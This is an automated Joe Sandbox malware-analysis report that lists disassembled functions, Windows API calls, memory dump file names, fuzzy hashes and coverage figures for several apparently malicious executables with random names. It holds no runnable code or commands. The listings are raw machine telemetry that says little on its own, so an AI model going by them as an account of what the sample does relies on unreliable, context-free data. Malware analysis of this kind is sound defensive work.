Instruction Fuzzy Hash: B8212771D0011A9BCB05EFA1C9919EEBBB5FF08308F10407AE106B6291DB794E40CB98

Function 00405EBC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00405EC1
LoadStringA.USER32(KA,?,?,00000000), ref: 00405F12

Strings

KA, xrefs: 00405F0F

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: H_prologLoadString
String ID: KA
API String ID: 385046869-4133974868
Opcode ID: 65d677eaf710bde40107d5e97ee8b2feebca7ae19d827cde6303db2279eeba92
Instruction ID: 682fdee239e6c4724d42c8af7adc4720fc3e2d38c4520a7b7ac2604701000241
Opcode Fuzzy Hash: 65d677eaf710bde40107d5e97ee8b2feebca7ae19d827cde6303db2279eeba92
Instruction Fuzzy Hash: 6C1126B1D011199ACB06EFA5C9959EEBBB4FF18304F50447EE445B3291DB7A5E00CBA4

Function 004160FA Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapReAlloc.KERNEL32(00000000,00000050,00000000,00000000,00415EC2,00000000,00000000,00000000,00413EF1,00000000,00000000,?,00000000,00000000,00000000), ref: 00416122
HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,00415EC2,00000000,00000000,00000000,00413EF1,00000000,00000000,?,00000000,00000000,00000000), ref: 00416156
VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 00416170
HeapFree.KERNEL32(00000000,?), ref: 00416187

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: AllocHeap$FreeVirtual
String ID:
API String ID: 3499195154-0
Opcode ID: b9288557613d4b1507cb107ac5399481b8ee784b68c3247b56fc213fdecf1f33
Instruction ID: c92a38fae87bb937ac208a7a453d8678043178d73965b4d0b203d58dccefea2c
Opcode Fuzzy Hash: b9288557613d4b1507cb107ac5399481b8ee784b68c3247b56fc213fdecf1f33
Instruction Fuzzy Hash: 98112B31300B01BFC7318F29EC869567BB5FB49764791862AF151C65B0C7709842CF48

Function 004156E1 Relevance: 5.0, APIs: 4, Instructions: 12COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(?,004154C2,?,00414B74), ref: 004156EE
InitializeCriticalSection.KERNEL32(?,004154C2,?,00414B74), ref: 004156F6
InitializeCriticalSection.KERNEL32(?,004154C2,?,00414B74), ref: 004156FE
InitializeCriticalSection.KERNEL32(?,004154C2,?,00414B74), ref: 00415706

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: CriticalInitializeSection
String ID:
API String ID: 32694325-0
Opcode ID: 9da826fcb73db9b2f0886f92194b085cad0f2cdeae026ac3c84f39be76329a94
Instruction ID: 9a5a21d657ffcc76f5c3c67f011d6e28d8344b300781f1748fbef07cd2b7b2eb
Opcode Fuzzy Hash: 9da826fcb73db9b2f0886f92194b085cad0f2cdeae026ac3c84f39be76329a94
Instruction Fuzzy Hash: CCC00231A05138ABCB712B65FC048563FB5EB882A03558077A1045203186612C12EFD8

Analysis Process: bQnXcKn6ehLDJGqEStjbnSyC.exePID: 2076, Parent PID: 7008COMMON

Execution Graph

Execution Coverage:	8.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	92
Total number of Limit Nodes:	6

Executed Functions

Function 0123D068 Relevance: 6.1, APIs: 4, Instructions: 129
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0123D0F6
GetCurrentThread.KERNEL32 ref: 0123D133
GetCurrentProcess.KERNEL32 ref: 0123D170
GetCurrentThreadId.KERNEL32 ref: 0123D1C9

Memory Dump Source

Source File: 00000008.00000002.2978352562.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1230000_bQnXcKn6ehLDJGqEStjbnSyC.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 8910da272c3ea979141aaf58d287a5694a8ccc5f5c1d5e1fdf8817aaf4368e2b
Instruction ID: a4f496c733afbcbe208199f46c664cd984631d1421b86715366bf7faadca8e31
Opcode Fuzzy Hash: 8910da272c3ea979141aaf58d287a5694a8ccc5f5c1d5e1fdf8817aaf4368e2b
Instruction Fuzzy Hash: 4D5166B09003098FDB08DFA9D588B9EBBF1AF88314F20C559E409A72A0D7345984CB65

Function 0123D078 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0123D0F6
GetCurrentThread.KERNEL32 ref: 0123D133
GetCurrentProcess.KERNEL32 ref: 0123D170
GetCurrentThreadId.KERNEL32 ref: 0123D1C9

Memory Dump Source

Source File: 00000008.00000002.2978352562.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1230000_bQnXcKn6ehLDJGqEStjbnSyC.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 9d47f9ff87fbaec9df9ac6a7b7d4dd5171acd74857141a7abdd5e6b82d751b2e
Instruction ID: 7f47507ae25b8c31f72f9cf077e707b63845b80019f6a575c4e91147de17da66
Opcode Fuzzy Hash: 9d47f9ff87fbaec9df9ac6a7b7d4dd5171acd74857141a7abdd5e6b82d751b2e
Instruction Fuzzy Hash: B55156B0D003498FDB04DFAAD588B9EBBF1EF88314F20C559E509A72A0D7346944CB65

Function 0123ADF0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0123B046

Strings

xR, xrefs: 0123AFA3
xR, xrefs: 0123AF7E

Memory Dump Source

Source File: 00000008.00000002.2978352562.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1230000_bQnXcKn6ehLDJGqEStjbnSyC.jbxd

Similarity

API ID: HandleModule
String ID: xR$xR
API String ID: 4139908857-2043949474
Opcode ID: d1d5a4179e2b6c48b377e4c3eafce436978823ae8db749253578401c00a9ff97
Instruction ID: 3943bbe67fc84edb5ddfa48d4e976ecbfeecad024280f24cb055d2551ba07b3c
Opcode Fuzzy Hash: d1d5a4179e2b6c48b377e4c3eafce436978823ae8db749253578401c00a9ff97
Instruction Fuzzy Hash: 277147B0A10B068FDB65DF29D18575ABBF1FF88300F008A2DD58ADBA50DB75E945CB90

Function 01234248 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 012359C9

Memory Dump Source

Source File: 00000008.00000002.2978352562.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1230000_bQnXcKn6ehLDJGqEStjbnSyC.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: cda2e4f4e477a74ee87a85bd8e148aa8135be5ee619cbf9311ccc36578120c88
Instruction ID: 46c8b2ba7b1305a1e8414dd66e9c90f47222e7a0b33d523bd3513183f7b11e70
Opcode Fuzzy Hash: cda2e4f4e477a74ee87a85bd8e148aa8135be5ee619cbf9311ccc36578120c88
Instruction Fuzzy Hash: CC41C2B0C1071DCBDB24DFA9C884B9EBBF5BF89314F20806AD509AB251DB756946CF90

Function 0123590C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 012359C9

Memory Dump Source

Source File: 00000008.00000002.2978352562.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1230000_bQnXcKn6ehLDJGqEStjbnSyC.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 11aa4ea70f747b246417944d341f446f042f5cecc59518b96976b45ef2d59549
Instruction ID: 0ed4dd55b7944d2bdbca8fa1ea766d246d8d891cafb35cc0b05cbc57df7f0290
Opcode Fuzzy Hash: 11aa4ea70f747b246417944d341f446f042f5cecc59518b96976b45ef2d59549
Instruction Fuzzy Hash: B141E0B0C10719CEDB24CFA9C884BDEBBF5BF89314F20806AD509AB251DB756946CF90

Function 0123D2B8 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0123D347

Memory Dump Source

Source File: 00000008.00000002.2978352562.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1230000_bQnXcKn6ehLDJGqEStjbnSyC.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 41ec6e1b6a063e9faa34a8fece5ab1903f51e6fc76ec7a9a0d9e4033c0b65011
Instruction ID: a01259c109bb86bef693354150e43a31c1368a07ae187617c0ef12587473b54e
Opcode Fuzzy Hash: 41ec6e1b6a063e9faa34a8fece5ab1903f51e6fc76ec7a9a0d9e4033c0b65011
Instruction Fuzzy Hash: DE21E0B59102099FDB10CFAAD985ADEBBF5EB48310F14841AE918A3350C378A954CFA1

Function 0123D2C0 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0123D347

Memory Dump Source

Source File: 00000008.00000002.2978352562.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1230000_bQnXcKn6ehLDJGqEStjbnSyC.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 022443e234243b4689f4bb099d9b75d44958de5c084c1538e457051e07a1ccf3
Instruction ID: 8ca5271c69e75712a5684a5676738e96a839ea2dab42075fc4d3bf454589e93c
Opcode Fuzzy Hash: 022443e234243b4689f4bb099d9b75d44958de5c084c1538e457051e07a1ccf3
Instruction Fuzzy Hash: 8821C4B59102499FDB10CFAAD984ADEBFF5EB48310F14841AE918A3350D374A954CFA5

Function 0123A830 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0123B0C1,00000800,00000000,00000000), ref: 0123B2D2

Memory Dump Source

Source File: 00000008.00000002.2978352562.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1230000_bQnXcKn6ehLDJGqEStjbnSyC.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 0646646c021319d6b06a19a513054e09d76f9e1ea1e4e78791fe61cd19feacb0
Instruction ID: c2ab8238cd94912d2fb14a83ea52a2d3a1dd0ca65a8a8c46e7b132fe89151bae
Opcode Fuzzy Hash: 0646646c021319d6b06a19a513054e09d76f9e1ea1e4e78791fe61cd19feacb0
Instruction Fuzzy Hash: 261114B68143498FDB10CFAAC444ADEFBF4EB88310F10852ED919A7200C775A945CFA5

Function 0123B260 Relevance: 1.6, APIs: 1, Instructions: 53
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0123B0C1,00000800,00000000,00000000), ref: 0123B2D2

Memory Dump Source

Source File: 00000008.00000002.2978352562.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1230000_bQnXcKn6ehLDJGqEStjbnSyC.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 0ed9455a21b2f2e4e6d4d0b9c54511ca002614b189a14f7a2d71e76be6b41ddf
Instruction ID: b9c87effe89a77053c31ea5d41ed35c71613f28d8f19b2e8660bbd8d266440b4
Opcode Fuzzy Hash: 0ed9455a21b2f2e4e6d4d0b9c54511ca002614b189a14f7a2d71e76be6b41ddf
Instruction Fuzzy Hash: 2C1123B6C003098FDB10CFAAC444ADEFBF4AB88310F14852AD629A7340C774A945CFA0

Function 0123AFE0 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0123B046

Memory Dump Source

Source File: 00000008.00000002.2978352562.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1230000_bQnXcKn6ehLDJGqEStjbnSyC.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 91b4cf791ee405eac0e7cb6ebede929631e64230a530b737369961f61f13eaf9
Instruction ID: 304cf0669ed322ffe6e7094488dae02d3b419263490dc7e01cc384df4b8aff93
Opcode Fuzzy Hash: 91b4cf791ee405eac0e7cb6ebede929631e64230a530b737369961f61f13eaf9
Instruction Fuzzy Hash: DC11DFB5C103498FDB24DF9AD444A9EFBF4AF88320F10845AD529A7650C379A549CFA1

Function 00E9D1FC Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2971352965.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e9d000_bQnXcKn6ehLDJGqEStjbnSyC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8bbd67ec5e04913391b6b064c8cefab3c2af2bcc5ecd01a0e6a7e6094520ea7
Instruction ID: d2ce58d44f82810ebeca15d42856bd8517544942c548ffbe17c3bef985d7738e
Opcode Fuzzy Hash: a8bbd67ec5e04913391b6b064c8cefab3c2af2bcc5ecd01a0e6a7e6094520ea7
Instruction Fuzzy Hash: FF21F1B1508300EFCF05DF54DDC4B26BBA5FB98314F24C669E9091A266C33AD816CBA1

Function 00E9D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2971352965.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e9d000_bQnXcKn6ehLDJGqEStjbnSyC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3512a70ac593aa5cd00ecc745041226b6934cd0e68571a4ca8619c6aaea3cb4f
Instruction ID: 67a2ac968cd479ec37fbaa24ece600d3009921dcb79f09c107c2d0dea77ca2c3
Opcode Fuzzy Hash: 3512a70ac593aa5cd00ecc745041226b6934cd0e68571a4ca8619c6aaea3cb4f
Instruction Fuzzy Hash: 0F2125B1508240EFCF05DF14DDC0B26BF65FB98328F24C569E8091B256C336D856CBA1

Function 00EBD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2972534605.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ebd000_bQnXcKn6ehLDJGqEStjbnSyC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0752d8300cdbd3b8d5b74ffbb8f4562fc8be17b58895af3831e95744b14349d3
Instruction ID: 419e8f831d310cf07c3cdf66ce44fed66d57b7f60e3b7b90ab8f2a03712e8847
Opcode Fuzzy Hash: 0752d8300cdbd3b8d5b74ffbb8f4562fc8be17b58895af3831e95744b14349d3
Instruction Fuzzy Hash: 9D21D375608200DFCB15EF14D984B57BBA6EB94314F24C569D80A5B296D33AD807CA61

Function 00EBD2BC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2972534605.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ebd000_bQnXcKn6ehLDJGqEStjbnSyC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64275517953384fd0f13eca34d0b8f546737396132db22cbd421b2b2974c06e0
Instruction ID: 487585695927eedaa508243f8268a30e688ecea4d5658b171bce2f5b3d404e6f
Opcode Fuzzy Hash: 64275517953384fd0f13eca34d0b8f546737396132db22cbd421b2b2974c06e0
Instruction Fuzzy Hash: EE212971508244DFDB01DF14DDC4B6BBBA5FB94324F24C569D8095B242D33AD806CB62

Function 00EBD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2972534605.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ebd000_bQnXcKn6ehLDJGqEStjbnSyC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0482c799ffcc8eb231398c08c951bea845e3269ca84f0d0a532f9b3406181479
Instruction ID: b2297ce4580438e08c9d8872fb0bd99e01773290d25c120c6f7e9b303372aca3
Opcode Fuzzy Hash: 0482c799ffcc8eb231398c08c951bea845e3269ca84f0d0a532f9b3406181479
Instruction Fuzzy Hash: 69212571608240EFCB05DF54D9C0B66BBA5FB84318F20C66DD80A5B2A1D336D806CB61

Function 00EBD005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2972534605.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ebd000_bQnXcKn6ehLDJGqEStjbnSyC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 508e447d3418e2b69f3ff7198bb993e2f2f6f440108077839ade4399c8125ee6
Instruction ID: c3a7b658a229572b6e933d0baf6045672c645011b68647fc60f5f714f3fb4c07
Opcode Fuzzy Hash: 508e447d3418e2b69f3ff7198bb993e2f2f6f440108077839ade4399c8125ee6
Instruction Fuzzy Hash: B321837550D3808FCB02DF24D994716BF72EB46314F28C5DAD8498B2A7C33A980ACB62

Function 00E9D1F7 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2971352965.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e9d000_bQnXcKn6ehLDJGqEStjbnSyC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3660dfe55a9ec3abc1fd528c2c7e977daaa4d4c3ae68719e8bb560421c7628fc
Instruction ID: cf47a43908976b84be97877a7351c900dce9e69f2fdcd35a9306023bc66e1ed2
Opcode Fuzzy Hash: 3660dfe55a9ec3abc1fd528c2c7e977daaa4d4c3ae68719e8bb560421c7628fc
Instruction Fuzzy Hash: 07219D76508240DFDF06CF50D9C4B56BF72FB94314F24C5A9DD091A666C33AD82ACBA1

Function 00E9D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2971352965.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e9d000_bQnXcKn6ehLDJGqEStjbnSyC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
Instruction ID: bf0d1c14a1aef823754aeadbbe05087eaedd1a8bb8ed9e5a690644683edf164d
Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
Instruction Fuzzy Hash: 98112676504280CFCF02CF10D9C4B16BF72FB94328F24C6A9D8094B256C336D85ACBA1

Function 00EBD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2972534605.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ebd000_bQnXcKn6ehLDJGqEStjbnSyC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction ID: 812a816a72623a308e23a50d26eb8527e45c9bde1aadad9c7765b8aa23c39ec4
Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction Fuzzy Hash: 5D11BE75508280DFCB02CF50C9C4B56BB71FB84328F24C6ADD8494B2A6C33AD81ACB51

Function 00EBD2B7 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2972534605.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ebd000_bQnXcKn6ehLDJGqEStjbnSyC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 118f051af2fa4d3b71157da4c1d703aecab942a5cdb4903c1e78cbe3821e71d1
Instruction ID: 21ab52956a51c2ed28543166b54e2b9566846356ef7e9d237811de5411f6e821
Opcode Fuzzy Hash: 118f051af2fa4d3b71157da4c1d703aecab942a5cdb4903c1e78cbe3821e71d1
Instruction Fuzzy Hash: 4011C875508240CFDB12CF14D9C475AFFB1FB84328F24C5A9D8495B656C33AD816CB92

Analysis Process: eROo1ugNChgONSxoiS6DxyMi.exePID: 1028, Parent PID: 7008COMMON

Execution Graph

Execution Coverage:	22.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	3%
Total number of Nodes:	99
Total number of Limit Nodes:	9

Executed Functions

Function 008A9510 Relevance: 9.6, Strings: 7, Instructions: 900COMMON

Download Yara Rule

Strings

,bq, xrefs: 008A9DFA
(o^q, xrefs: 008A9A46
Hbq, xrefs: 008A9912
(o^q, xrefs: 008A9D82
,bq, xrefs: 008A9E08
(o^q, xrefs: 008AA0AD
(o^q, xrefs: 008A9D90

Memory Dump Source

Source File: 00000009.00000002.2671462775.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8a0000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$(o^q$,bq$,bq$Hbq
API String ID: 0-1608600535
Opcode ID: c8027d157ba2bbd9b0c5aa90dc0ca07267f24aae1f8e4b4161f13a17790371c6
Instruction ID: 0d8df5c0753f778ea64a11023067b2fb25f249b5e10597cf1d5cd886839fa44c
Opcode Fuzzy Hash: c8027d157ba2bbd9b0c5aa90dc0ca07267f24aae1f8e4b4161f13a17790371c6
Instruction Fuzzy Hash: 55725A70A042199FDB14DF69C884AAEBBF2FF89304F248469E446EB7A1DB34DD41CB51

Function 073C1C59 Relevance: 5.6, Instructions: 5641
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.2847805227.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_73c0000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2de2b937be62c165cd7156b0131253eb45eeae04ce2b402444572154d393cf08
Instruction ID: da6180bb3ae034b166f64c1b43bc4ca5c7b2d4fbfefc480cfbf018ef1cd27bdc
Opcode Fuzzy Hash: 2de2b937be62c165cd7156b0131253eb45eeae04ce2b402444572154d393cf08
Instruction Fuzzy Hash: 25C30A70A11228CFDB58EF38D98969CBBF6EB89304F4044E9D449A7354DB346E89CF46

Function 073C1C70 Relevance: 5.6, Instructions: 5633
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.2847805227.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_73c0000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ff2497b72db7469d4303c25c2605e197d96b9f6223ee3ef71a8e7e0dacdd26e
Instruction ID: 543bf7d36b081a6a1fbfac4b8e5e9aa742a1af971823e479b272753dabe88971
Opcode Fuzzy Hash: 2ff2497b72db7469d4303c25c2605e197d96b9f6223ee3ef71a8e7e0dacdd26e
Instruction Fuzzy Hash: DAC30A70A11228CFDB58EF38D98969CBBF6EB89304F4044E9D449A7354DB346E89CF46

Function 008AB738 Relevance: 5.0, Strings: 3, Instructions: 1211COMMON

Download Yara Rule

Strings

(o^q, xrefs: 008AC439
$^q, xrefs: 008AC25C
$^q, xrefs: 008AC27F

Memory Dump Source

Source File: 00000009.00000002.2671462775.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8a0000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID:
String ID: (o^q$$^q$$^q
API String ID: 0-27156697
Opcode ID: 9b9b8f52f8cbfc3a90ea2cb3b5c933182b4d94fdb58cd431f3ff277554c564f9
Instruction ID: 0769ca6c2b3771ac72f3e3abe88715686be2888d3858a87efb0494065758420c
Opcode Fuzzy Hash: 9b9b8f52f8cbfc3a90ea2cb3b5c933182b4d94fdb58cd431f3ff277554c564f9
Instruction Fuzzy Hash: B7B24174A002188FEB15DFA8C854B9EBBB2FF89301F1480A9D50AAB7A1DF349D45DF51

Function 00B59B68 Relevance: 1.7, APIs: 1, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateProcessAsUserW.KERNELBASE(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 00B59CD3

Memory Dump Source

Source File: 00000009.00000002.2696892814.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b50000_eROo1ugNChgONSxoiS6DxyMi.jbxd

Similarity

API ID: CreateProcessUser
String ID:
API String ID: 2217836671-0
Opcode ID: 6c9358d0444e242b7c3993a3ec081ce9504ad690e85e29641d600ed19adda220
Instruction ID: a6dc3c193e44f637085f3b4a51edd883c1ca0de74411a3383a7baedcfbbc403f
